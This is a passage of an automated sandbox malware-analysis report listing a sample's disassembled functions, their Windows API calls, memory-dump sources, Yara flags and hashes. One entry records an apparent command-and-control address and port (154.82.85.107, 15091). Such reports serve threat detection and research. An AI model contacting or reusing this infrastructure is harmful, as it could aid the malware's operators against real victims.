                                                                                    • Instruction Fuzzy Hash: 2021CF30F40309ABDB249FADD986B6FFBF4EF40705F4089ADE949E6640E630A810CB50
                                                                                    Function 030711B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __floor_pentium4.LIBCMT ref: 030711E9
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03071226
                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03071255
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocFree__floor_pentium4
                                                                                    • String ID:
                                                                                    • API String ID: 2605973128-0
                                                                                    • Opcode ID: 884e90150c147231209f51fb53a0d3d08fc11cccb4034277fcf96d36e0710d62
                                                                                    • Instruction ID: 2f3806b1aa8408cf7508f4abaef8f053c6bb304a59e3f4e5d555a4412a1834df
                                                                                    • Opcode Fuzzy Hash: 884e90150c147231209f51fb53a0d3d08fc11cccb4034277fcf96d36e0710d62
                                                                                    • Instruction Fuzzy Hash: 55219F71E01709AFDB14DFAED845B6EFBF8FF40B05F0085A9E859E6680E674A8108754
                                                                                    Function 02711100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __floor_pentium4.LIBCMT ref: 0271112F
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0271115F
                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02711192
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocFree__floor_pentium4
                                                                                    • String ID:
                                                                                    • API String ID: 2605973128-0
                                                                                    • Opcode ID: 93e04f6645779620d339d853cc619390c40c5102b6041df41648c9d3e00c92a1
                                                                                    • Instruction ID: 5d1285aae0d0c5883f12b9132f9404140b0da0c54863da005c70692608dddc96
                                                                                    • Opcode Fuzzy Hash: 93e04f6645779620d339d853cc619390c40c5102b6041df41648c9d3e00c92a1
                                                                                    • Instruction Fuzzy Hash: 54118170E40709ABDB209FADDD86B6EFBF8EF04705F4084A9ED59E6240E670A9148B51
                                                                                    Function 03071100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __floor_pentium4.LIBCMT ref: 0307112F
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0307115F
                                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03071192
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocFree__floor_pentium4
                                                                                    • String ID:
                                                                                    • API String ID: 2605973128-0
                                                                                    • Opcode ID: b73da09cb183d0df273feeaaf2831230591a6f06cd085425a886eb1cd9b269aa
                                                                                    • Instruction ID: e236e7b9db4925067049f036e1a2890cfec3cab7bf1c80c41e2d1e5141e841a1
                                                                                    • Opcode Fuzzy Hash: b73da09cb183d0df273feeaaf2831230591a6f06cd085425a886eb1cd9b269aa
                                                                                    • Instruction Fuzzy Hash: 7D11D370E01308AFDB10DFADDC86B6EFBF8FF04705F0084A9E959E6280E674A8108714
                                                                                    Function 10005300 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                    • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                      • Part of subcall function 10012400: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,10005395), ref: 1001242D
                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?setstate@?$basic_ios@?write@?$basic_ostream@AttributesBios_base@std@@FileV12@
                                                                                    • String ID:
                                                                                    • API String ID: 1581416325-0
                                                                                    • Opcode ID: b6dca49e7f140338e59bc9ee201abc6e232935be4f3253fc458cc6489671f659
                                                                                    • Instruction ID: 5c88ff171285725a0febf88608a5dc827106f22a602be97f7403975b38e1ce9c
                                                                                    • Opcode Fuzzy Hash: b6dca49e7f140338e59bc9ee201abc6e232935be4f3253fc458cc6489671f659
                                                                                    • Instruction Fuzzy Hash: CA215970A00109ABEB54DF64CC95FAEB774FB04750F108268F51AAB2D0DB70AA85CF94
                                                                                    Function 03079DE0 Relevance: 4.5, APIs: 3, Instructions: 39windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03079E04
                                                                                    • GdipDisposeImage.GDIPLUS(?), ref: 03079E18
                                                                                    • GdipDisposeImage.GDIPLUS(?), ref: 03079E3B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                                    • String ID:
                                                                                    • API String ID: 800915452-0
                                                                                    • Opcode ID: 9bd56c4ac99466bbb795004d62e5f715aefb1d412fa03c46fd1f2cc556e72d84
                                                                                    • Instruction ID: 0388820a664aaefdd63698e13f2e54c57f58ff07b1fa9e634179ca3e31e6df5c
                                                                                    • Opcode Fuzzy Hash: 9bd56c4ac99466bbb795004d62e5f715aefb1d412fa03c46fd1f2cc556e72d84
                                                                                    • Instruction Fuzzy Hash: 20F08C71D0222DAB8B10EFA4D8448AEF7B8BB49611B01865AEC05AB340D7348A15CBE8
                                                                                    Function 03079AC0 Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(0309FB64), ref: 03079ADC
                                                                                    • GdiplusStartup.GDIPLUS(0309FB60,?,?), ref: 03079B15
                                                                                    • LeaveCriticalSection.KERNEL32(0309FB64), ref: 03079B26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                                    • String ID:
                                                                                    • API String ID: 389129658-0
                                                                                    • Opcode ID: 7952839fbf060ff651f40fa05c24b875876bd8e3d1511b26d96af8bef9aa660c
                                                                                    • Instruction ID: 5e470c7fd02cf5e13f111c2fd5681a2ce0307aa824d9f7d8f1e3313021ba3ee0
                                                                                    • Opcode Fuzzy Hash: 7952839fbf060ff651f40fa05c24b875876bd8e3d1511b26d96af8bef9aa660c
                                                                                    • Instruction Fuzzy Hash: ADF06D7194320EAFDF00EFE1E86A7AAB7BCF704316F50019AD904D6245D7BA0148DBA5
                                                                                    Function 100155C0 Relevance: 4.5, APIs: 3, Instructions: 28networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • socket.WS2_32(?,?,?), ref: 10015552
                                                                                    • WSACleanup.WS2_32 ref: 10015566
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001556E
                                                                                    • connect.WS2_32(00000280,?,?), ref: 10015594
                                                                                    • closesocket.WS2_32(00000280), ref: 100155A9
                                                                                    • freeaddrinfo.WS2_32(00000000), ref: 100155C9
                                                                                    • WSACleanup.WS2_32 ref: 100155D9
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 100155E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cleanupexit$closesocketconnectfreeaddrinfosocket
                                                                                    • String ID:
                                                                                    • API String ID: 2176086335-0
                                                                                    • Opcode ID: 31cdd7d84edd926fbab02f43dc40615c1f458f31985033d2ed90bc99502f0a45
                                                                                    • Instruction ID: 936c76793dfa74d26cdff9f771fb93b9bb5aba2917ce267f62b899282f39a517
                                                                                    • Opcode Fuzzy Hash: 31cdd7d84edd926fbab02f43dc40615c1f458f31985033d2ed90bc99502f0a45
                                                                                    • Instruction Fuzzy Hash: 0EF05E74A00618DFE700CFA4C988A5DB3B2FB48316F24C285E8199B3A0C771DF81DB50
                                                                                    Function 02713200 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 15sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID: 15091$154.82.85.107
                                                                                    • API String ID: 3472027048-3399520398
                                                                                    • Opcode ID: 346f4c3b72b9b8faead9f385b39b067f2181ff5a50a09f7fbfe99b3dcb0271c3
                                                                                    • Instruction ID: 871022e1907b7e72c99ef89ae3b4e58289dcc5436175b1f18f164d0622c30bc8
                                                                                    • Opcode Fuzzy Hash: 346f4c3b72b9b8faead9f385b39b067f2181ff5a50a09f7fbfe99b3dcb0271c3
                                                                                    • Instruction Fuzzy Hash: F9D022F0A40531ABFB2D852088A6637FB71BF803143880508E88BA7280C3B07D0CCBE0
                                                                                    Function 02717156 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __getptd_noexit.LIBCMT ref: 0271715B
                                                                                      • Part of subcall function 02719896: GetLastError.KERNEL32(00000001,00000000,02717112,02716F0C,00000000,?,02719FB0,00000000,00000001,00000000,?,0271C0CF,00000018,02727C70,0000000C,0271C15F), ref: 0271989A
                                                                                      • Part of subcall function 02719896: ___set_flsgetvalue.LIBCMT ref: 027198A8
                                                                                      • Part of subcall function 02719896: __calloc_crt.LIBCMT ref: 027198BC
                                                                                      • Part of subcall function 02719896: DecodePointer.KERNEL32(00000000,?,02719FB0,00000000,00000001,00000000,?,0271C0CF,00000018,02727C70,0000000C,0271C15F,00000000,00000000,?,027199BA), ref: 027198D6
                                                                                      • Part of subcall function 02719896: GetCurrentThreadId.KERNEL32 ref: 027198EC
                                                                                      • Part of subcall function 02719896: SetLastError.KERNEL32(00000000,?,02719FB0,00000000,00000001,00000000,?,0271C0CF,00000018,02727C70,0000000C,0271C15F,00000000,00000000,?,027199BA), ref: 02719904
                                                                                    • __freeptd.LIBCMT ref: 02717165
                                                                                      • Part of subcall function 02719A58: TlsGetValue.KERNEL32(?,?,02717711,00000000,02727B60,00000008,02717776,?,?,?,02727B80,0000000C,02717831,?), ref: 02719A79
                                                                                      • Part of subcall function 02719A58: TlsGetValue.KERNEL32(?,?,02717711,00000000,02727B60,00000008,02717776,?,?,?,02727B80,0000000C,02717831,?), ref: 02719A8B
                                                                                      • Part of subcall function 02719A58: DecodePointer.KERNEL32(00000000,?,02717711,00000000,02727B60,00000008,02717776,?,?,?,02727B80,0000000C,02717831,?), ref: 02719AA1
                                                                                      • Part of subcall function 02719A58: __freefls@4.LIBCMT ref: 02719AAC
                                                                                      • Part of subcall function 02719A58: TlsSetValue.KERNEL32(00000023,00000000,?,02717711,00000000,02727B60,00000008,02717776,?,?,?,02727B80,0000000C,02717831,?), ref: 02719ABE
                                                                                    • ExitThread.KERNEL32 ref: 0271716E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 4224061863-0
                                                                                    • Opcode ID: 8fa20365b7c87c205c9bbe7198933d8bba65baaf6696e7d700041c504c0b2c6f
                                                                                    • Instruction ID: 6e000c26b2903532d1844b99d14c3dd0d22067441194a936990437313b84af0d
                                                                                    • Opcode Fuzzy Hash: 8fa20365b7c87c205c9bbe7198933d8bba65baaf6696e7d700041c504c0b2c6f
                                                                                    • Instruction Fuzzy Hash: F6C02B3040020CFBDB25373ECC1D80F3A5F9DC0304B918410FA08C1040DF70E802C955
                                                                                    Function 0307F964 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __getptd_noexit.LIBCMT ref: 0307F969
                                                                                      • Part of subcall function 03083DE2: GetLastError.KERNEL32(00000001,00000000,0307F920,0307F6FC,00000000,?,03084500,00000000,00000001,00000000,?,03088DE6,00000018,03096448,0000000C,03088E76), ref: 03083DE6
                                                                                      • Part of subcall function 03083DE2: ___set_flsgetvalue.LIBCMT ref: 03083DF4
                                                                                      • Part of subcall function 03083DE2: __calloc_crt.LIBCMT ref: 03083E08
                                                                                      • Part of subcall function 03083DE2: DecodePointer.KERNEL32(00000000,?,03084500,00000000,00000001,00000000,?,03088DE6,00000018,03096448,0000000C,03088E76,00000000,00000000,?,03083F06), ref: 03083E22
                                                                                      • Part of subcall function 03083DE2: GetCurrentThreadId.KERNEL32 ref: 03083E38
                                                                                      • Part of subcall function 03083DE2: SetLastError.KERNEL32(00000000,?,03084500,00000000,00000001,00000000,?,03088DE6,00000018,03096448,0000000C,03088E76,00000000,00000000,?,03083F06), ref: 03083E50
                                                                                    • __freeptd.LIBCMT ref: 0307F973
                                                                                      • Part of subcall function 03083FA6: TlsGetValue.KERNEL32(?,?,030810F0,00000000,03096278,00000008,03081155,?,?,?,03096298,0000000C,03081210,?), ref: 03083FC7
                                                                                      • Part of subcall function 03083FA6: TlsGetValue.KERNEL32(?,?,030810F0,00000000,03096278,00000008,03081155,?,?,?,03096298,0000000C,03081210,?), ref: 03083FD9
                                                                                      • Part of subcall function 03083FA6: DecodePointer.KERNEL32(00000000,?,030810F0,00000000,03096278,00000008,03081155,?,?,?,03096298,0000000C,03081210,?), ref: 03083FEF
                                                                                      • Part of subcall function 03083FA6: __freefls@4.LIBCMT ref: 03083FFA
                                                                                      • Part of subcall function 03083FA6: TlsSetValue.KERNEL32(00000025,00000000,?,030810F0,00000000,03096278,00000008,03081155,?,?,?,03096298,0000000C,03081210,?), ref: 0308400C
                                                                                    • ExitThread.KERNEL32 ref: 0307F97C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 4224061863-0
                                                                                    • Opcode ID: 37ae46181baaa6eda29f61a861ad175eeb05afab63d09c712ab0df92630580f9
                                                                                    • Instruction ID: 0b1fb6e4073cd461dc99505a4e864e1d37ab8b17ef45cf62c954fe24f99af642
                                                                                    • Opcode Fuzzy Hash: 37ae46181baaa6eda29f61a861ad175eeb05afab63d09c712ab0df92630580f9
                                                                                    • Instruction Fuzzy Hash: 98C08C2C0063097B8B107731980894A3A5C9EC06007140010A8088D040DE28DC0080A0
                                                                                    Function 02EF01CB Relevance: 3.3, APIs: 2, Instructions: 267memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02EF022B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134547256.0000000002EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2ef0000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                    • Instruction ID: 74d6010ac56dde56779d5fd572020cc6df36c91747142b8755be1f7aa9d0117d
                                                                                    • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                    • Instruction Fuzzy Hash: 5DA17F70A41606EFDB54CFA9C880AAEB7F1FF48308F149069E615DB356E730EA50CB90
                                                                                    Function 02713350 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time_memmovetime
                                                                                    • String ID:
                                                                                    • API String ID: 1463837790-0
                                                                                    • Opcode ID: 2e8c464e0f98c50793b062f82301dc62c12c4261c57b9249cbad5cfdecff57ea
                                                                                    • Instruction ID: 110caf925e6e30bd548f69e28f09606f34a4d7dd2093c37ce890bcb5599a424d
                                                                                    • Opcode Fuzzy Hash: 2e8c464e0f98c50793b062f82301dc62c12c4261c57b9249cbad5cfdecff57ea
                                                                                    • Instruction Fuzzy Hash: D5519A727002019FD726CF6DC8C5A7AB7AABF8831471486ADED1A9B704DB31F851CB90
                                                                                    Function 03073360 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Time_memmovetime
                                                                                    • String ID:
                                                                                    • API String ID: 1463837790-0
                                                                                    • Opcode ID: 8b7c67a28dc406bdc9c6371948cb2fd1d4fc011a53ff9f0a0610e3ee878f1546
                                                                                    • Instruction ID: 83042353fe8bfde18464f5564cc3f847452aefef57cf83ae3dc5b5ec9f3a61ed
                                                                                    • Opcode Fuzzy Hash: 8b7c67a28dc406bdc9c6371948cb2fd1d4fc011a53ff9f0a0610e3ee878f1546
                                                                                    • Instruction Fuzzy Hash: 8E51D77AB012019FE729CF69C8C096AF7A9FF8421071885ACE919CBB04D731F851C7D8
                                                                                    Function 0040CA88 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNEL32(00000000,0040CB9F,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040CC26,00000000,?,00000105), ref: 0040CB33
                                                                                    • GetSystemDefaultUILanguage.KERNEL32(00000000,0040CB9F,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040CC26,00000000,?,00000105), ref: 0040CB5B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: DefaultLanguage$SystemUser
                                                                                    • String ID:
                                                                                    • API String ID: 384301227-0
                                                                                    • Opcode ID: 20e8ba98e2816f8af13bed9515c1d960020764da17156fa36e2f3308999935a6
                                                                                    • Instruction ID: 44e41ead65ef66f727125de80912159cd7281fcfb7f7393cce7e535fa76c4ae3
                                                                                    • Opcode Fuzzy Hash: 20e8ba98e2816f8af13bed9515c1d960020764da17156fa36e2f3308999935a6
                                                                                    • Instruction Fuzzy Hash: D4312E70A10209DBDB10EB99D8C2AAEB7B5EB44304F50467BE400B72D5DB78AD45CB99
                                                                                    Function 02712FB0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02713023
                                                                                    • recv.WS2_32(?,?,00040000,00000000), ref: 02713044
                                                                                      • Part of subcall function 0271710D: __getptd_noexit.LIBCMT ref: 0271710D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: __getptd_noexitrecvselect
                                                                                    • String ID:
                                                                                    • API String ID: 4248608111-0
                                                                                    • Opcode ID: d15647cb759708b97f700eb667779d0a682ce3cbfa27f8111b5caba48d97cfe4
                                                                                    • Instruction ID: aa16727692bf80cf6cd3b02c9b8f795453bb5835377798b823588c75ac20d64d
                                                                                    • Opcode Fuzzy Hash: d15647cb759708b97f700eb667779d0a682ce3cbfa27f8111b5caba48d97cfe4
                                                                                    • Instruction Fuzzy Hash: 1021D3B0E00208DBDB25DF2CDC88B9A77B6EF44725F1001E4E515AB190DBB0AD84CFA1
                                                                                    Function 03072FD0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 03073043
                                                                                    • recv.WS2_32(?,?,00040000,00000000), ref: 03073064
                                                                                      • Part of subcall function 0307F91B: __getptd_noexit.LIBCMT ref: 0307F91B
                                                                                    Memory Dump Source
